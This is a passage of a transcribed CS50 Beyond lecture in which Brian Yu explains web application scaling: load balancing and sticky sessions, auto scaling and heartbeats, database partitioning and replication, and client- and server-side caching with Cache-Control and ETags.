  • Depending upon the type of user experience

  • you want, depending on how computationally

  • expensive certain operations are, you might choose different load balancing

  • methods.

  • Yeah?

  • AUDIENCE: [INAUDIBLE] benchmarking, and what are some common ways to do that?

  • BRIAN YU: Yeah, there are software tools that can do this.

  • There are a number of different ones-- the names are escaping me

  • at the moment--

  • where you can basically test on a particular URL

  • and get a sense for how well it's able to handle that load.

  • And if you have particular use cases, I can chat with you about that, as well.

  • So all right, let's imagine we have two servers now.

  • And every time a user makes an HTTP request

  • to a server, every time they request a page,

  • we direct them to one server or the other server using

  • one of these methods, either by choosing randomly or by round robin

  • or by figuring out which one currently has the fewest users connected to it

  • or is handling the fewest connections.

  • What can go wrong?

  • Whenever we're dealing with issues of scale, we just try and solve a problem

  • and figure out what new problems have arisen.

  • Yeah?

  • AUDIENCE: You only have five servers, and now you need six.

  • BRIAN YU: Yeah.

  • Certainly, if you only have five servers and suddenly you need six,

  • that could potentially become a problem, as well.

  • But let's even assume that we have enough servers.

  • We have five servers, and every time someone load a page,

  • they get sent to a different server based on one of these methods.

  • What can still go wrong with the user experience?

  • And in particular, I'll give you a hint.

  • Let's think about sessions.

  • What can go wrong?

  • Remember, sessions were ways of storing information-- in our case,

  • inside of the server--

  • about the user's current interaction with the server.

  • It stored which user was logged in.

  • It stored the current state of the tic-tac-toe game.

  • It stored other information.

  • Yeah?

  • AUDIENCE: You have to pick one [INAUDIBLE]..

  • BRIAN YU: Yeah, exactly.

  • If I initially load a page and I go to server one and some information

  • about me is stored in the session, like whether I'm logged in

  • or the current state of my game or something else,

  • and then I load another page and it takes

  • me to server four this time, well, now, that server

  • doesn't have access to the same session information

  • that server one had if the information about the session

  • was stored in the server.

  • And now, that information is lost.

  • So I could load a page, and suddenly, now, I'm

  • logged out of the page for no apparent reason

  • even though I've logged in just a moment ago.

  • And then I could go to another page, and maybe by chance,

  • I'm back to server one, and now I'm logged in again.

  • So strange things can begin to happen.

  • And so to solve that, what could we do?

  • How can we make sure that sessions are preserved

  • when the user is requesting pages?

  • Again, no one correct answer.

  • Multiple possibilities here.

  • How do we solve this problem?

  • Yeah?

  • AUDIENCE: Would there any way to store the session on the load balancer?

  • BRIAN YU: Store the session on the load balancer.

  • That's a good idea.

  • And that will actually get me at the first idea here,

  • which is this idea of sticky sessions.

  • And this is slightly different.

  • Rather than store all the session information in the load balancer,

  • it just needs to store for this particular user which

  • server has their session information.

  • So if I went to server number one initially,

  • the load balancer will remember me based on my IP address, cookie, or whatever

  • and say, all right, next time I try and request a page,

  • let me direct them back to server number one, for instance.

  • That way, whenever I come back, I'm always going to go to the same place.

  • There are other ways to solve this problem, as well.

  • You could store session information in the database

  • that all the servers have access to.

  • You could store session information on the client side, whereby

  • it doesn't matter what server you go to, because all the session information is

  • inside the client.

  • So there are a number of ways to solve this problem,

  • but these generally fall under the heading of session-aware load

  • balancing.

  • Someone mentioned the problem of, OK, well, I have five servers,

  • but what happens when I need six?

  • To solve this in the world of cloud computing,

  • where nowadays most people don't maintain their own hardware

  • for their web applications, they just rent out

  • hardware on someone else's servers, for instance, on AWS, for instance,

  • use Amazon servers--

  • you can take advantage of auto scaling, which automatically will grow or shrink

  • the number of servers based upon load, whereby you could initially

  • have two servers.

  • But if more users come about and you need more,

  • we can add a third server into the mix.

  • More people come out, we need even more.

  • We add a fourth server.

  • And auto scaling goes in both directions.

  • So if suddenly we find, all right, we had a lot of load

  • at this particular peak time of the day but now there are

  • fewer users on the site, the auto load balancer can sort of say,

  • all right, we don't need four servers anymore.

  • Let's go back to three and then later on, if it needs doing,

  • go back up to four again.

  • And it can automatically, dynamically reconfigure the number of servers

  • in order to figure out what the optimal number is

  • given the number of users that are currently using the application.

  • What happens, though, when one of the servers fails for some reason?

  • The server just dies, for instance.

  • The load balancer doesn't necessarily know about that.

  • And so if it's still directing people across four different servers,

  • it could direct users to that server that is no longer operational.

  • Any thoughts on how we might solve that problem?

  • Yeah?

  • AUDIENCE: Have the load balancer ping the server at determined intervals

  • to see if it's still there.

  • BRIAN YU: Yeah, some sort of ping to make sure

  • That the server is still there.

  • And often, one of the easiest ways that this is done

  • is via what's called a heartbeat, whereby each of the servers

  • gives off a heartbeat every fixed number of seconds or minutes, for instance,

  • whereby if every 10 seconds the server pings the heartbeat,

  • that gets sent to the load balancer.

  • If ever the load balancer doesn't hear the heartbeat from the server,

  • it can know that that server is no longer operational, and it can say,

  • all right, you know what?

  • Let's stop sending users there and only send users to the other three servers.

  • Questions about that or any of the ideas of how we scale our servers

  • to be able to handle load?

  • We decided, all right, if too many people are on one server,

  • we need to split up into two different servers.

  • But that introduced a bunch of problems that we

  • had to solve-- problems about load balancing, problems about what to do

  • about sessions, so on and so forth.

  • Yeah?

  • AUDIENCE: Do you hear a lot about distributed servers?

  • I'm wondering how they [INAUDIBLE].

  • BRIAN YU: Sure.

  • How do servers share data?

  • Well, they use databases.

  • And of course, as we start to figure out what to do with more and more servers,

  • we also need to figure out what to do about databases,

  • figure out how to scale databases and make sure that as we scale them,

  • the databases are able to handle that load, as well.

  • And so in the past, we've had, all right, a load balancer.

  • We've got servers.

  • And in our model right now, we have a database that both of these servers

  • are connected to.

  • But of course, the problem is soon going to arise of, all right,

  • now we've got a lot of servers that are all

  • trying to connect to the same database.

  • And now, we've got yet another single point

  • where things could potentially go wrong or where

  • we could potentially be overloaded.

  • So how do we solve this type of problem?

  • One of the most common ways is database partitioning.

  • One form of database partitioning you've, in fact, already seen,

  • and it's just an extension of what we've been doing with SQL,

  • whereby we have this flights table.

  • And we could say, all right, rather than store the origin and the origin code,

  • let's go ahead and separate what's in one table

  • into a couple different tables.

  • Let's separate the flights table into a locations table

  • where the locations table has a number for each possible location.

  • And then it also, in the flights table, now,

  • only needs to store a single number for the origin ID and the destination ID.

  • We could also separate tables in different ways.

  • If we have some general way we could partition

  • a table into different parts that are generally

  • going to be queried separately, then we can

  • do another partition where I could say, all right,

  • my flight's table is getting big.

  • Let's split it up.

  • And all right, at my airline, the international departures and arrivals

  • are handled separately from the domestic departures and arrivals.

  • So no need for those to be in the same table.

  • Let me just go ahead and take flights and separate it

  • into a domestic flights table and an international flights table,

  • for instance.

  • One way to just partition things into two different tables that

  • could potentially be stored in different places that ultimately

  • allows for handling of scale.

  • But ultimately, all of these are problems

  • that are still going to lead to the fundamental problem of if I only

  • have one database and 10 or dozens of servers that are all

  • trying to communicate with that same database,

  • we're going to run into problems.

  • The database can only handle some fixed number of connections.

  • And so one solution to this is database replication.

  • So all right, how does database replication work?

  • Well, probably the simplest form of database replication

  • is what's called single primary replication, whereby

  • I have one what's called primary database and maybe

  • three databases in total, but only one that I'm

  • going to consider the primary one.

  • And you can read data from any of the databases.

  • You can get data out of any of the three databases,

  • whereby if there are three servers and each one wants to read data,

  • they can just share among the three databases reading data

  • to make sure that we're not overloading any one

  • database with too many connections.

  • But you can only write data to a single database.

  • And by only writing data to a single database,

  • that means that anytime this database is updated,

  • then this database, our primary database,

  • just needs to update the other two databases.

  • Say, all right, there's been a change made to the primary database.

  • And it's the primary database's responsibility

  • to then communicate to the other two databases what those changes are.

  • And so that's single-primary replication.

  • Yeah?

  • AUDIENCE: How is that more efficient than just communicating with all three

  • of them?

  • Because I think you're sending information

  • from the first database to the second and third.

  • [INAUDIBLE] information sent that's just rewriting to all three of them.

  • BRIAN YU: That's true, though.

  • Databases could potentially batch information

  • together into transactions and things and groups

  • so as to be a little bit more efficient.

  • So certainly ways around that problem.

  • But yeah, a good point.

  • Of course, this helps the read problem.

  • It makes it easier to be able to read data out of databases.

  • But it leaves open a potential vulnerability

  • or a potential scalability problem with regard to writing data,

  • because there is still only a single database on which I can actually

  • write data to if that one database is responsible for updating

  • all of the other databases.

  • And so a more complex version of this is what's

  • known as multi-primary replication, where

  • the idea is that each database can be read to and written from.

  • But now, updates get a lot more complicated.

  • All of the databases need to have some notion and some way

  • of being able to update each other.

  • And there, conflicts begin to arrive.

  • You can have update conflicts where two different databases

  • have updated the same row.

  • All right, how do you resolve that problem?

  • You can have uniqueness conflicts, whereby

  • if you add a row to each of two databases at the same time, maybe

  • they get the same ID.

  • Maybe this one only has 27 rows, so this database

  • adds a new row with ID number 28, and this database does the same thing.

  • And now, when they try to update each other,

  • we have two rows with the same ID.

  • And now, we need some way of resolving those,

  • because the IDs are supposed to be unique.

  • And so that can create problems, as well.

  • And then there are other types of conflicts, too-- delete conflicts,

  • whereby one database tries to delete a row at the same time

  • another database tries to update a row.

  • So which do you do?

  • Do you update the row?

  • Do you delete the row?

  • And so these are all conflicts that when you're setting up

  • a multi-primary replication system, you need

  • to figure out how you're going to ultimately resolve those conflicts.

  • You gain the ability to write to all the databases,

  • but new problems arise as you begin to do that.

  • Yeah?

  • AUDIENCE: So is the information in each database the same?

  • Are they [INAUDIBLE] with each other?

  • BRIAN YU: Yeah.

  • In this model, the databases in general are

  • going to be the same, though they're not always perfectly going

  • to be in sync, which is yet another problem, whereby there might

  • be some time after I write to this database

  • before that data propagates through all of the databases, for instance.

  • AUDIENCE: So why not keep it in one?

  • BRIAN YU: You could keep all the information in one database.

  • But a single database server can only handle so many connections.

  • And so you might imagine that having three different servers, three

  • different computers that are all able to handle incoming requests,

  • just increases the capacity of your application

  • to be able to handle that kind of load.

  • All right.

  • Questions about databases, database replication, any of the scale problems

  • that come about there?

  • All right.

  • Final thing I'll mention on the topic of scaling that can be helpful

  • is just the idea of caching.

  • Caching is something we've talked about a lot before.

  • But a general idea could be that in order to try and solve this problem

  • of constantly having to request information from the database,

  • if we could store data in some other place-- in particular,

  • inside of a cache--

  • then we don't need to access the database as often, because we've

  • got the information already stored.

  • And so one way to do this is via client-side caching.

  • And so inside of the HTTP headers, when an HTTP response

  • is sending back information to a user, you

  • can add an HTTP header called cache control that basically

  • says for up to this number of seconds, you can just store information

  • about this page and not request it again if you try

  • and request the page for a second time.

  • And this helps to make sure that if the browser tries to request

  • the page again, it doesn't need to.

  • It can just use the version that's stored inside of the cache.

  • And a more recent development is this idea of an ETag, or an entity tag.

  • And the idea here is that if we have some web resource, some document,

  • some piece of data from a database that our web application is sending out

  • to users, when I send users that resource, that document,

  • I'll send that document, and I'll also send an entity tag that

  • corresponds to that particular version of the document

  • and send them both to the user.

  • And imagine this is a big document.

  • It's a lot of data, so it's expensive to query and to send to the user.

  • The next time the user tries to request this page, what the user can do

  • is the user can send the entity tag, the ETag, along with their request.

  • I would like to request this resource, and, oh, by the way,

  • I already have this version of the entity stored

  • locally inside of my computer's cache.

  • And if the web application then looks at that ETag and says,

  • all right, you know what?

  • That's the latest version of the document.

  • The web application can just respond--

  • in particular, with an HTTP status code of 304, meaning not modified,

  • to just say, you know what?

  • This entity tag is the most recent entity tag.

  • Don't bother trying to request the document again.

  • Just use the version you saved locally in your cache.

  • And if, on the off chance, the document's been updated

  • and therefore has a new ETag value, then the web application

  • goes through the process of sending that entire document back to the user.

  • But by taking advantage of technologies like this,

  • this can allow us to make sure that we're not

  • making too many requests to the database,

  • that we don't make redundant requests if a particular resource hasn't changed.

  • So caching can be done on the client side.

  • Caching can also be done on the server side, which

  • changes our diagram slightly so as to look a little bit more

  • like this, whereby now, we've got some more complications here.

  • We've got some load balancer that's communicating

  • with a bunch of different servers.

  • All of those servers have to interact with the database,

  • and maybe you've got multiple databases going on here that are each able to do

  • reads and writes, either in a single-primary model

  • or a multi-primary model.

  • And those servers also have access to some cache that makes it easier

  • to access data quickly, in a sense, saying,

  • if there's some expensive database query,

  • don't bother performing the database query again and again and again.

  • Take the results of that database query once.

  • Save it inside of the cache.

  • And from then on, the server can just look to the cache

  • and get information out of there.

  • So lot of security and scalability concerns

  • that can potentially come about as you begin web application development.

  • And so goal of today was really just to give you

  • a sense for the types of concerns to be aware of,

  • the types of things to be thinking about,

  • and the types of issues that will come about

  • if you decide to take a web application and begin to have more and more people

  • actually start to use it.

  • So questions about that or about any of the other topics

  • we've covered this week?

  • All right.

  • So with the remainder of this morning, between now and about 12:30 or so,

  • we'll leave it open to more project time, an opportunity

  • to work on any of the projects you've worked on

  • so far over the course of this week and also an opportunity to work

  • on something new if you would like to.

  • I know many of you yesterday decided to start on new projects, projects

  • of your own choosing built in React or Flask

  • or using JavaScript or any of the other technologies

  • we've talked about this week.

  • Before we conclude, though, I do have to say a couple of thank yous,

  • first to David for helping to advise the class, to the teaching fellows--

  • Josh and Christian and Athena and Julia--

  • for being excellent in helping to answer questions

  • and helping to make sure that the course can run smoothly, to Andrew up

  • in the back, who's been taking care of the production side of everything

  • over the course of this week, making sure that all the lectures are recorded

  • and making sure they're posted online, such that afterwards, you,

  • when you're here or when you're not here,

  • are able to come online to see them.

  • So thank you to everyone for helping to make the course possible.

  • Thank you to all of you for coming to the course.

  • Hope you enjoyed it.

  • Hope you got things out of it.

  • We've really only scratched the surface, though,

  • of a lot of the topics that we've covered

  • over the course of the past week.

  • There's a lot more to CSS and HTML and JavaScript and Flask and Python

  • and React than we were really able to touch on over the course of the week.

  • It was really meant to be more of an opportunity

  • to give you some exposure to some of the fundamentals of these ideas,

  • some of the tools and the concepts that you can ultimately

  • use them as you begin to design web applications of your own.

  • So I do hope that you've learned something from the week but,

  • in particular, that you found things that are interesting to you, such

  • that you continue to take those ideas and explore them.

  • Go beyond just what we've been able to cover over the course of this week

  • and explore what else these technologies and these tools and these ideas

  • ultimately have to offer.

  • So thank you so much.

  • We'll stick around until 12:30 to help with project time.

  • [APPLAUSE]

  • But this was CS50 Beyond.

[MUSIC PLAYING]

Subtitles and vocabulary

Click the word to look it up Click the word to find further inforamtion about it